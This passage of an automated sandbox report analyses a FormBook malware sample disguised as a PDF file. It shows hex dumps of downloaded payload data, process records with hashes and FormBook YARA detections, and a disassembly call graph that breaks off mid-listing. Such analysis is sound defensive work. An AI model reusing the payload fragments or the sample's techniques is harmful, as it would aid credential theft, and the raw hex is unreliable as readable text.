                                                                                                                                              2024-10-04 06:06:05 UTC8000INData Raw: a8 ad 86 26 6e fe ec 65 bb e6 ae f2 4c 5f aa eb e8 9f ac 53 31 99 a1 c6 91 12 92 37 8e 68 a3 3b 69 b6 cc 83 e7 89 65 4e e4 b5 6e 9d c1 50 d3 a0 41 e2 b3 73 d0 b5 45 14 a4 8e f5 6d c1 2b 9b 2b 7b 29 70 c0 1c bf 22 30 f2 03 b8 2d e6 97 49 6f fd e4 69 15 05 dd 2f 5c ca e6 aa 88 af c9 45 b0 22 f2 fb 6c b0 62 04 85 e3 1b 25 d3 9b eb ca 25 9b 24 96 1a c3 ab fd f3 3e 80 73 b4 53 9f 3a 51 26 2e 8b 6d f3 a8 f6 ed e7 b9 da 1a b3 fd 18 90 41 8a cb 73 25 b0 46 36 34 b5 31 bb 5f 23 8f 55 ca a4 04 82 ab cf c7 3d d5 a0 0d 92 ef 0e 53 ee 56 3f 9c 86 16 2f ce dd 3a 59 cb 08 3e 01 d7 50 b3 8b 63 84 31 ce d1 b5 f9 38 85 a7 ed 4f dd 10 c9 5c fa c9 49 c0 ca 9d cf d1 3b 93 af c3 c7 ab 20 7a 2a 04 94 8b e4 f3 14 60 a8 bb 3e fe 8f 3e 3f e2 a5 67 c7 8b de 9f aa 85 a8 0b 4a 0e 75
                                                                                                                                              Data Ascii: &neL_S17h;ieNnPAsEm++{)p"0-Ioi/\E"lb%%$>sS:Q&.mAs%F641_#U=SV?/:Y>Pc18O\I; z*`>>?gJu
                                                                                                                                              2024-10-04 06:06:05 UTC8000INData Raw: c9 b0 93 16 ae fc fa 4d f8 5a e2 33 c8 10 59 cb ba b7 3a dd 6c 84 b6 70 96 f0 72 7b a9 2e 88 e2 b5 ad ba f7 1a e8 af 81 96 8b d6 d8 94 c8 07 a5 0d 77 ae 3c 9f ad 29 74 9c 88 10 76 60 ad b6 66 d0 b0 15 23 e7 13 a2 82 dd 5c 86 cd eb 7f 95 b3 2f 0d 9e 07 53 fc 6b dd 15 1f 4e 67 84 21 01 d2 f0 45 e0 af 3c 5e 73 89 26 52 ce 40 57 2d 57 6f e7 40 2c c2 d3 d8 ca e2 c4 39 51 40 1b 36 a4 d7 c3 93 d6 5f 1b 8f d5 b6 ef 7f f6 c3 53 1e 00 78 3c fa 36 32 ae c4 4a 97 61 1f dd 5a a5 1e ef d9 09 8f 1b 6d 59 e6 d5 44 9e 16 42 d0 85 4e 36 fa d3 92 29 54 ff bb 1e d0 e7 06 24 87 cf 59 05 f5 16 25 5d 8d 3a 0b 21 bd e5 2b 46 b6 c1 14 45 91 17 6c 90 2a 80 5e fa 21 da 6b 8e c4 f3 e4 8f 34 05 3e 6a 0b e1 71 df 2d c4 ae 51 60 eb ff 26 5c ac f8 76 6a f3 b0 d1 af 2a a4 cd 3f 46 d1 56
                                                                                                                                              Data Ascii: MZ3Y:lpr{.w<)tv`f#\/SkNg!E<^s&R@W-Wo@,9Q@6_Sx<62JaZmYDBN6)T$Y%]:!+FEl*^!k4>jq-Q`&\vj*?FV
                                                                                                                                              2024-10-04 06:06:05 UTC8000INData Raw: 3f f9 e3 a5 ec db 25 8c 17 04 90 de de 13 35 13 22 ce 92 42 72 bf 8c 27 51 b5 f8 70 45 95 8e 46 7c 97 2a 5e f8 60 c2 f4 6f 74 f4 b3 45 b6 e6 57 86 f3 9a a3 e5 e7 f1 2b 93 cc 41 fc a3 b7 0c 16 99 5c a3 35 a8 22 25 67 7f 22 22 27 fe 22 aa b1 02 6e 7b 0d 44 39 f3 b5 d3 d5 f5 23 05 3d 62 0c b6 01 ca ca 62 75 3c c3 6e a4 33 c9 c8 79 77 cb 36 a7 3d 49 b0 d6 b7 49 50 36 30 c5 e2 0d 4c 78 42 ba 54 9b 69 3c c4 5f 63 63 0f e5 fa 55 4e 2a 35 5b d8 72 1b a5 9d 32 14 e4 0a f4 09 01 20 dd 6c 93 52 54 b2 4b 4b 8f e4 5f ab 5a 17 ac 9a 37 8b ce ae eb 3c f9 f0 90 1d ff 7c a6 84 7c a4 d1 55 55 1f ef 9b 28 9f d9 dc 69 8b ee 18 70 d0 74 1a 58 5c 38 c9 f3 6c a8 d4 f9 50 a8 68 db 52 08 c2 47 c3 19 22 ac 6c 98 7d 85 88 28 d0 27 9a d9 79 22 8b 07 d0 79 bf 79 78 bc 0f 6c 2a 4f 80
                                                                                                                                              Data Ascii: ?%5"Br'QpEF|*^`otEW+A\5"%g""'"n{D9#=bbu<n3yw6=IIP60LxBTi<_ccUN*5[r2 lRTKK_Z7<||UU(iptX\8lPhRG"l}('y"yyxl*O
                                                                                                                                              2024-10-04 06:06:05 UTC8000INData Raw: 5e 03 bd 52 c3 42 ee 65 7e c0 20 6f 1c d0 48 bb cc c9 cc e1 09 bc 16 d6 01 80 c9 f9 dd b6 23 cd 14 e7 43 5a 6a 0e 6d 5c 85 f3 39 b2 c7 ec 2b 61 dd 4f 34 7c 9a f4 97 da 71 c7 1d 25 9c b8 41 51 c9 5e 51 d5 fb c2 e3 59 0f 26 4f a3 77 0c 80 86 ff bc bd 27 f1 01 87 f4 a5 ba f8 09 6d 2d 98 c6 94 27 de ba 83 6e e6 01 25 61 67 1f 51 e3 6e fc 66 37 f6 67 0e 36 cf ba b4 e9 ff f8 0d 17 7d dc 9c 3a fb 48 c5 b7 69 e2 2c 28 18 cd 28 ee a3 53 65 c8 1c c7 fe 7b 84 6e d7 30 c9 b0 bd d4 b6 fe ac b1 e8 b2 b8 5f b9 11 ea 9a ba 47 37 ee 02 84 40 00 bd 59 9d dd 63 ec 78 0e 66 b9 a2 ea 5c f9 02 84 0b f0 d5 9f 52 7b 10 53 2d df 9c 1d d3 b5 27 44 52 19 0d c1 6c 69 8f ae 40 22 70 22 31 9b 1e b9 b3 28 11 56 cb 5f b0 95 3d 96 91 9e cc b7 89 7d 89 ba 50 fd c5 40 3d e2 52 e6 6f 2b b4
                                                                                                                                              Data Ascii: ^RBe~ oH#CZjm\9+aO4|q%AQ^QY&Ow'm-'n%agQnf7g6}:Hi,((Se{n0_G7@Ycxf\R{S-'DRli@"p"1(V_=}P@=Ro+


                                                                                                                                              Statistics

                                                                                                                                              CPU Usage

                                                                                                                                              Click to jump to process

                                                                                                                                              Memory Usage

                                                                                                                                              Click to jump to process

                                                                                                                                              Behavior

                                                                                                                                              Click to jump to process

                                                                                                                                              System Behavior

                                                                                                                                              General

                                                                                                                                              Target ID:0
                                                                                                                                              Start time:02:05:38
                                                                                                                                              Start date:04/10/2024
                                                                                                                                              Path:C:\Users\user\Desktop\-pdf.bat.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Users\user\Desktop\-pdf.bat.exe"
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              File size:920'486 bytes
                                                                                                                                              MD5 hash:2A19EAC38990809A62213E2B89BE0F60
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:2
                                                                                                                                              Start time:02:05:56
                                                                                                                                              Start date:04/10/2024
                                                                                                                                              Path:C:\Users\user\Desktop\-pdf.bat.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Users\user\Desktop\-pdf.bat.exe"
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              File size:920'486 bytes
                                                                                                                                              MD5 hash:2A19EAC38990809A62213E2B89BE0F60
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.38153009509.00000000322E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.38153009509.00000000322E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.38153921691.0000000032940000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.38153921691.0000000032940000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                              Reputation:low
                                                                                                                                              Has exited:true

                                                                                                                                              General

                                                                                                                                              Target ID:3
                                                                                                                                              Start time:02:06:16
                                                                                                                                              Start date:04/10/2024
                                                                                                                                              Path:C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe"
                                                                                                                                              Imagebase:0x500000
                                                                                                                                              File size:140'800 bytes
                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.42753648495.0000000001020000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.42753648495.0000000001020000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.42754818639.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.42754818639.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                              Reputation:high
                                                                                                                                              Has exited:false

                                                                                                                                              General

                                                                                                                                              Target ID:4
                                                                                                                                              Start time:02:06:18
                                                                                                                                              Start date:04/10/2024
                                                                                                                                              Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Windows\SysWOW64\ipconfig.exe"
                                                                                                                                              Imagebase:0x1f0000
                                                                                                                                              File size:29'184 bytes
                                                                                                                                              MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.42207281231.0000000003880000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.42207281231.0000000003880000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.42206068173.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.42206068173.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                              Reputation:moderate
                                                                                                                                              Has exited:false

                                                                                                                                              Disassembly

                                                                                                                                              Reset < >

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:21.4%
                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                Signature Coverage:22.8%
                                                                                                                                                Total number of Nodes:1559
                                                                                                                                                Total number of Limit Nodes:39
                                                                                                                                                execution_graph 4899 401c41 4900 403002 21 API calls 4899->4900 4901 401c4a 4900->4901 4902 403002 21 API calls 4901->4902 4903 401c53 4902->4903 4906 406734 wsprintfW 4903->4906 4905 401cdb 4906->4905 4907 4024c2 4908 40303e 21 API calls 4907->4908 4909 4024c8 4908->4909 4910 40303e 21 API calls 4909->4910 4911 4024d1 4910->4911 4912 40303e 21 API calls 4911->4912 4913 4024da 4912->4913 4914 4066e4 2 API calls 4913->4914 4919 4024e2 4914->4919 4915 4024f3 lstrlenW lstrlenW 4917 405e3d 28 API calls 4915->4917 4916 405e3d 28 API calls 4916->4919 4918 40253a SHFileOperationW 4917->4918 4918->4919 4920 402ea1 4918->4920 4919->4915 4919->4916 4919->4920 4921 402b42 4922 402b48 4921->4922 4923 402b50 FindNextFileW 4922->4923 4924 4018be 4922->4924 4923->4924 4925 403747 4926 403759 SetTimer 4925->4926 4927 40376d 4925->4927 4926->4927 4928 4037bc 4927->4928 4931 4033cb MulDiv 4927->4931 4930 40377b wsprintfW SetWindowTextW SetDlgItemTextW 4930->4928 4931->4930 4648 402048 4649 403002 21 API calls 4648->4649 4650 40204e 4649->4650 4651 403002 21 API calls 4650->4651 4652 402057 4651->4652 4653 402061 ShowWindow 4652->4653 4654 40206c EnableWindow 4652->4654 4655 402ea1 4653->4655 4654->4655 4932 403e4b 4933 403e56 4932->4933 4934 403e5a 4933->4934 4935 403e5d GlobalAlloc 4933->4935 4935->4934 4936 7031103a 4937 70311052 4936->4937 4938 703110c5 4937->4938 4939 70311081 4937->4939 4940 70311061 4937->4940 4941 7031156c GlobalFree 4939->4941 4952 7031156c 4940->4952 4946 70311079 4941->4946 4943 70311072 4944 7031156c GlobalFree 4943->4944 4944->4946 4945 70311091 GlobalSize 4947 7031109a 4945->4947 4946->4945 4946->4947 4948 7031109e GlobalAlloc 4947->4948 4950 703110af 4947->4950 4949 703115c5 3 API calls 4948->4949 4949->4950 4951 703110b8 GlobalFree 4950->4951 4951->4938 4954 70311572 4952->4954 4953 70311578 4953->4943 4954->4953 4955 70311584 GlobalFree 4954->4955 4955->4943 4956 401ecc 4957 403002 21 API calls 4956->4957 4958 401eda SetWindowLongW 4957->4958 4959 402ea1 4958->4959 4960 70312ebf 4961 70312ed7 4960->4961 4962 70311309 2 API calls 4961->4962 4963 70312ef2 4962->4963 4964 40234f 4965 40303e 21 API calls 4964->4965 4966 402356 4965->4966 4967 40303e 21 API calls 4966->4967 4968 402361 4967->4968 4969 40303e 21 API calls 4968->4969 4970 40236e 4969->4970 4971 40303e 21 API calls 4970->4971 4972 402379 4971->4972 4973 40303e 21 API calls 4972->4973 4975 402384 4973->4975 4974 4023c4 CoCreateInstance 4979 4023e8 4974->4979 4975->4974 4976 40303e 21 API calls 4975->4976 4976->4974 4977 405e3d 28 API calls 4978 4024ba 4977->4978 4979->4977 4980 402dd1 4981 402df2 4980->4981 4982 402dd9 4980->4982 4983 4069fb 5 API calls 4981->4983 4985 403002 21 API calls 4982->4985 4986 402e72 4982->4986 4984 402e2a 4983->4984 4987 40303e 21 API calls 4984->4987 4988 402de9 4985->4988 4989 402e33 4987->4989 4990 403002 21 API calls 4988->4990 4989->4986 4991 402e37 IIDFromString 4989->4991 4990->4981 4991->4986 4992 402e47 4991->4992 4992->4986 4995 406c2f lstrcpynW 4992->4995 4994 402e66 CoTaskMemFree 4994->4986 4995->4994 4996 4059d3 4997 4059e8 4996->4997 4998 4059fc 4996->4998 4999 405a41 CallWindowProcW 4997->4999 5000 4059ee 4997->5000 5001 405a04 IsWindowVisible 4998->5001 5006 405a1b 4998->5006 5004 4059f8 4999->5004 5002 4055eb SendMessageW 5000->5002 5001->4999 5003 405a11 5001->5003 5002->5004 5008 4057dd SendMessageW 5003->5008 5006->4999 5013 4055b9 5006->5013 5009 40583c SendMessageW 5008->5009 5010 4057fe GetMessagePos ScreenToClient SendMessageW 5008->5010 5012 405834 5009->5012 5011 405839 5010->5011 5010->5012 5011->5009 5012->5006 5022 406c2f lstrcpynW 5013->5022 5015 4055cc 5023 406734 wsprintfW 5015->5023 5017 4055d6 5018 401533 102 API calls 5017->5018 5019 4055df 5018->5019 5024 406c2f lstrcpynW 5019->5024 5021 4055e6 5021->4999 5022->5015 5023->5017 5024->5021 4625 402656 4626 40303e 21 API calls 4625->4626 4627 40266d 4626->4627 4628 40303e 21 API calls 4627->4628 4629 402678 4628->4629 4644 4063ba 4629->4644 4632 402ea5 4633 4026d1 4636 4026e7 4633->4636 4637 4026d8 4633->4637 4634 4026bb 4635 40303e 21 API calls 4634->4635 4638 4026c2 lstrlenW 4635->4638 4640 402700 RegSetValueExW 4636->4640 4641 4032c7 48 API calls 4636->4641 4639 403002 21 API calls 4637->4639 4638->4640 4643 4026df 4639->4643 4642 40271c RegCloseKey 4640->4642 4641->4643 4642->4632 4643->4640 4645 4063c9 4644->4645 4646 4063d2 RegCreateKeyExW 4645->4646 4647 402697 4645->4647 4646->4647 4647->4632 4647->4633 4647->4634 5025 70311aa7 5026 7031156c GlobalFree 5025->5026 5029 70311abf 5026->5029 5027 70311b01 GlobalFree 5028 70311add 5028->5027 5029->5027 5029->5028 5030 70311aed VirtualFree 5029->5030 5030->5027 5031 405758 lstrcpynW lstrlenW 4819 40225d 4820 402335 4819->4820 4821 40226e 4819->4821 4823 405e3d 28 API calls 4820->4823 4822 40303e 21 API calls 4821->4822 4824 402275 4822->4824 4830 40234a 4823->4830 4825 40303e 21 API calls 4824->4825 4826 402281 4825->4826 4827 40228b GetModuleHandleW 4826->4827 4828 40229c LoadLibraryExW 4826->4828 4829 4022b0 4827->4829 4831 402298 4827->4831 4828->4820 4828->4829 4840 40637e 4829->4840 4831->4828 4834 4022c4 4837 405e3d 28 API calls 4834->4837 4838 4022da 4834->4838 4835 402306 4836 405e3d 28 API calls 4835->4836 4836->4838 4837->4838 4838->4830 4839 402329 FreeLibrary 4838->4839 4839->4830 4845 40657e WideCharToMultiByte 4840->4845 4842 40639b 4843 4063a2 GetProcAddress 4842->4843 4844 4022ba 4842->4844 4843->4844 4844->4834 4844->4835 4845->4842 5032 402cde 5033 403002 21 API calls 5032->5033 5035 402b21 5033->5035 5034 402d10 5036 402d35 5034->5036 5037 402d25 5034->5037 5035->5032 5035->5034 5040 401709 5035->5040 5039 405fbd 21 API calls 5036->5039 5038 403002 21 API calls 5037->5038 5038->5040 5039->5040 5041 40285f 5042 402883 5041->5042 5043 402899 5041->5043 5044 403002 21 API calls 5042->5044 5045 4028c3 5043->5045 5046 40289e 5043->5046 5055 402889 5044->5055 5048 40303e 21 API calls 5045->5048 5047 40303e 21 API calls 5046->5047 5049 4028a5 5047->5049 5050 4028ca lstrlenW 5048->5050 5058 40657e WideCharToMultiByte 5049->5058 5050->5055 5052 402910 5053 4028b5 lstrlenA 5053->5055 5054 4028fc 5054->5052 5056 406b20 WriteFile 5054->5056 5055->5052 5055->5054 5057 406599 5 API calls 5055->5057 5056->5052 5057->5054 5058->5053 5059 401ce0 5060 40303e 21 API calls 5059->5060 5061 401ce7 5060->5061 5062 403002 21 API calls 5061->5062 5063 401cf0 wsprintfW 5062->5063 5064 402ea1 5063->5064 5065 402566 5066 402574 5065->5066 5067 40256e 5065->5067 5069 402585 5066->5069 5070 40303e 21 API calls 5066->5070 5068 40303e 21 API calls 5067->5068 5068->5066 5071 40303e 21 API calls 5069->5071 5073 402594 5069->5073 5070->5069 5071->5073 5072 40303e 21 API calls 5074 40259d WritePrivateProfileStringW 5072->5074 5073->5072 5075 402d69 5076 403002 21 API calls 5075->5076 5077 402d6f 5076->5077 5078 405fbd 21 API calls 5077->5078 5079 401709 5077->5079 5078->5079 5080 401aec 5081 401aa2 5080->5081 5084 401ab1 5080->5084 5082 40303e 21 API calls 5081->5082 5083 401aa7 5082->5083 5085 40682e 70 API calls 5083->5085 5085->5084 5086 40216c 5087 40303e 21 API calls 5086->5087 5088 402173 5087->5088 5089 4066e4 2 API calls 5088->5089 5090 402179 5089->5090 5091 402188 5090->5091 5093 406734 wsprintfW 5090->5093 5093->5091 5094 404fef 5095 405025 5094->5095 5096 404fff 5094->5096 5098 40585e 8 API calls 5095->5098 5097 40561d 22 API calls 5096->5097 5099 40500c SetDlgItemTextW 5097->5099 5100 405031 5098->5100 5099->5095 5101 401af0 5102 40303e 21 API calls 5101->5102 5103 401af7 lstrlenW 5102->5103 5105 401afd 5103->5105 5104 40303e 21 API calls 5104->5105 5105->5104 5107 402855 5105->5107 5108 406a30 GetFileAttributesW CreateFileW 5105->5108 5108->5105 5109 70311000 5112 7031101b 5109->5112 5113 7031156c GlobalFree 5112->5113 5114 70311020 5113->5114 5115 70311032 5114->5115 5116 70311024 GlobalAlloc 5114->5116 5117 703115c5 3 API calls 5115->5117 5116->5115 5118 70311019 5117->5118 5119 401ef3 5120 403002 21 API calls 5119->5120 5121 401efb 5120->5121 5122 40303e 21 API calls 5121->5122 5124 401f3c GetClientRect LoadImageW SendMessageW 5121->5124 5122->5124 5125 401f9c 5124->5125 5127 401fa7 5124->5127 5126 401fa0 DeleteObject 5125->5126 5125->5127 5126->5127 4539 402af5 4540 402afc 4539->4540 4551 401709 4539->4551 4541 403002 21 API calls 4540->4541 4542 402b03 4541->4542 4543 402b10 SetFilePointer 4542->4543 4545 402b21 4543->4545 4543->4551 4544 403002 21 API calls 4544->4545 4545->4544 4546 402d10 4545->4546 4545->4551 4547 402d35 4546->4547 4548 402d25 4546->4548 4550 405fbd 21 API calls 4547->4550 4549 403002 21 API calls 4548->4549 4549->4551 4550->4551 5128 402b75 5129 40303e 21 API calls 5128->5129 5130 402b7c FindFirstFileW 5129->5130 5131 402b90 5130->5131 5134 406734 wsprintfW 5131->5134 5133 402b67 5134->5133 5135 402077 5136 40303e 21 API calls 5135->5136 5137 40207d 5136->5137 5138 40303e 21 API calls 5137->5138 5139 402086 5138->5139 5140 40303e 21 API calls 5139->5140 5141 40208f 5140->5141 5142 40303e 21 API calls 5141->5142 5143 402098 5142->5143 5144 405e3d 28 API calls 5143->5144 5145 4020a4 5144->5145 5152 406b08 ShellExecuteExW 5145->5152 5147 4020ea 5149 401709 5147->5149 5153 406629 WaitForSingleObject 5147->5153 5150 402109 CloseHandle 5150->5149 5152->5147 5154 406640 5153->5154 5155 406656 GetExitCodeProcess 5154->5155 5156 406324 2 API calls 5154->5156 5155->5150 5157 406647 WaitForSingleObject 5156->5157 5157->5154 5158 70311b0a 5159 70311b38 5158->5159 5160 70312351 21 API calls 5159->5160 5161 70311b3f 5160->5161 5162 70311b52 5161->5162 5163 70311b46 5161->5163 5165 70311b73 5162->5165 5166 70311b5c 5162->5166 5164 703115eb 2 API calls 5163->5164 5167 70311b50 5164->5167 5169 70311b79 5165->5169 5170 70311b9f 5165->5170 5168 703115c5 3 API calls 5166->5168 5172 70311b61 5168->5172 5173 70311668 3 API calls 5169->5173 5171 703115c5 3 API calls 5170->5171 5171->5167 5174 70311668 3 API calls 5172->5174 5175 70311b7e 5173->5175 5177 70311b67 5174->5177 5176 703115eb 2 API calls 5175->5176 5178 70311b84 GlobalFree 5176->5178 5179 703115eb 2 API calls 5177->5179 5178->5167 5180 70311b6d GlobalFree 5178->5180 5179->5180 5182 402e7c SendMessageW 5183 402e94 InvalidateRect 5182->5183 5184 402ea1 5182->5184 5183->5184 5185 401efe GetDlgItem 5186 401f09 5185->5186 5187 40303e 21 API calls 5186->5187 5189 401f3c GetClientRect LoadImageW SendMessageW 5186->5189 5187->5189 5190 401f9c 5189->5190 5192 401fa7 5189->5192 5191 401fa0 DeleteObject 5190->5191 5190->5192 5191->5192 4870 4025ff 4871 402608 4870->4871 4872 40262f 4870->4872 4874 4030c1 21 API calls 4871->4874 4873 40303e 21 API calls 4872->4873 4875 402636 4873->4875 4876 40260f 4874->4876 4882 40307c 4875->4882 4878 402615 4876->4878 4881 402648 4876->4881 4879 40303e 21 API calls 4878->4879 4880 40261c RegDeleteValueW RegCloseKey 4879->4880 4880->4881 4883 403089 4882->4883 4884 403090 4882->4884 4883->4881 4884->4883 4886 40141e 4884->4886 4887 4063ed RegOpenKeyExW 4886->4887 4888 40145b 4887->4888 4889 40146f RegEnumValueW 4888->4889 4896 401493 4888->4896 4897 401514 4888->4897 4890 401503 RegCloseKey 4889->4890 4889->4896 4890->4897 4891 4014ce RegEnumKeyW 4892 4014d8 RegCloseKey 4891->4892 4891->4896 4893 4069fb 5 API calls 4892->4893 4895 4014e9 4893->4895 4894 40141e 6 API calls 4894->4896 4895->4897 4898 4014ed RegDeleteKeyW 4895->4898 4896->4890 4896->4891 4896->4892 4896->4894 4897->4883 4898->4897 5193 401000 5194 401039 BeginPaint GetClientRect 5193->5194 5195 40100a DefWindowProcW 5193->5195 5197 40110f 5194->5197 5198 40119a 5195->5198 5199 401117 5197->5199 5200 40107e CreateBrushIndirect FillRect DeleteObject 5197->5200 5201 401185 EndPaint 5199->5201 5202 40111d CreateFontIndirectW 5199->5202 5200->5197 5201->5198 5202->5201 5203 401130 6 API calls 5202->5203 5203->5201 5204 401d01 5205 401d5d 5204->5205 5206 401d0f 5204->5206 5208 401d67 5205->5208 5209 401d8c GlobalAlloc 5205->5209 5207 401d50 5206->5207 5213 401d1e 5206->5213 5211 405fbd 21 API calls 5207->5211 5214 401709 5208->5214 5224 406c2f lstrcpynW 5208->5224 5210 405fbd 21 API calls 5209->5210 5210->5214 5211->5205 5221 406c2f lstrcpynW 5213->5221 5215 401d79 GlobalFree 5215->5214 5217 401d2d 5222 406c2f lstrcpynW 5217->5222 5219 401d3c 5223 406c2f lstrcpynW 5219->5223 5221->5217 5222->5219 5223->5214 5224->5215 5225 401b03 5226 403002 21 API calls 5225->5226 5227 401b0a 5226->5227 5228 403002 21 API calls 5227->5228 5229 401b15 5228->5229 5230 40303e 21 API calls 5229->5230 5231 401b20 lstrlenW 5230->5231 5232 401b3c 5231->5232 5235 401b67 5231->5235 5232->5235 5237 406c2f lstrcpynW 5232->5237 5234 401b5b 5234->5235 5236 401b5f lstrlenW 5234->5236 5236->5235 5237->5234 4238 403804 SetErrorMode GetVersionExW 4239 40384f GetVersionExW 4238->4239 4241 403886 4238->4241 4240 403871 4239->4240 4240->4241 4242 4038ed 4241->4242 4243 4069fb 5 API calls 4241->4243 4244 4062b3 3 API calls 4242->4244 4243->4242 4245 403903 lstrlenA 4244->4245 4245->4242 4246 403911 4245->4246 4247 4069fb 5 API calls 4246->4247 4248 403918 4247->4248 4249 4069fb 5 API calls 4248->4249 4250 40391f 4249->4250 4251 4069fb 5 API calls 4250->4251 4252 40392b #17 OleInitialize SHGetFileInfoW 4251->4252 4328 406c2f lstrcpynW 4252->4328 4255 403979 GetCommandLineW 4329 406c2f lstrcpynW 4255->4329 4257 40398a 4258 40670b CharNextW 4257->4258 4259 4039c4 CharNextW 4258->4259 4260 403ab4 GetTempPathW 4259->4260 4271 4039dd 4259->4271 4330 403da8 4260->4330 4262 403acc 4263 403ad0 GetWindowsDirectoryW lstrcatW 4262->4263 4264 403b26 DeleteFileW 4262->4264 4265 403da8 12 API calls 4263->4265 4340 40348f GetTickCount GetModuleFileNameW 4264->4340 4267 403aec 4265->4267 4267->4264 4270 403af0 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4267->4270 4268 40670b CharNextW 4268->4271 4269 403b3c 4274 40670b CharNextW 4269->4274 4278 403bb5 4269->4278 4313 403ba7 4269->4313 4272 403da8 12 API calls 4270->4272 4271->4260 4271->4268 4276 403aa0 4271->4276 4277 403b1e 4272->4277 4286 403b55 4274->4286 4427 406c2f lstrcpynW 4276->4427 4277->4264 4277->4278 4445 4037c2 4278->4445 4281 403bcc 4283 406bbd MessageBoxIndirectW 4281->4283 4282 403d0f 4284 403d94 4282->4284 4285 403d18 GetCurrentProcess OpenProcessToken 4282->4285 4289 403bd7 ExitProcess 4283->4289 4290 403d30 LookupPrivilegeValueW AdjustTokenPrivileges 4285->4290 4291 403d64 4285->4291 4287 403bdf 4286->4287 4288 403b7f 4286->4288 4293 406611 5 API calls 4287->4293 4428 40674d 4288->4428 4290->4291 4294 4069fb 5 API calls 4291->4294 4297 403be4 lstrcatW 4293->4297 4295 403d6b 4294->4295 4298 403d80 ExitWindowsEx 4295->4298 4301 403d8d 4295->4301 4299 403c08 lstrcatW lstrcmpiW 4297->4299 4300 403bf9 lstrcatW 4297->4300 4298->4284 4298->4301 4299->4278 4303 403c2b 4299->4303 4300->4299 4459 401533 4301->4459 4304 403c34 4303->4304 4305 403c3b 4303->4305 4308 405f41 4 API calls 4304->4308 4309 405f21 2 API calls 4305->4309 4307 403b9c 4444 406c2f lstrcpynW 4307->4444 4311 403c39 4308->4311 4312 403c40 SetCurrentDirectoryW 4309->4312 4311->4312 4314 403c65 4312->4314 4315 403c56 4312->4315 4370 405b41 4313->4370 4455 406c2f lstrcpynW 4314->4455 4454 406c2f lstrcpynW 4315->4454 4318 405fbd 21 API calls 4319 403c97 DeleteFileW 4318->4319 4320 403ca2 CopyFileW 4319->4320 4325 403c73 4319->4325 4320->4325 4321 403cfb 4323 406352 39 API calls 4321->4323 4322 406352 39 API calls 4322->4325 4323->4278 4324 405fbd 21 API calls 4324->4325 4325->4318 4325->4321 4325->4322 4325->4324 4327 403ce6 CloseHandle 4325->4327 4456 4067eb CreateProcessW 4325->4456 4327->4325 4328->4255 4329->4257 4331 406e52 5 API calls 4330->4331 4332 403db4 4331->4332 4333 403dbe 4332->4333 4334 40666b 3 API calls 4332->4334 4333->4262 4335 403dc6 4334->4335 4336 405f21 2 API calls 4335->4336 4337 403dcc 4336->4337 4338 406b6b 2 API calls 4337->4338 4339 403dd7 4338->4339 4339->4262 4462 406a30 GetFileAttributesW CreateFileW 4340->4462 4342 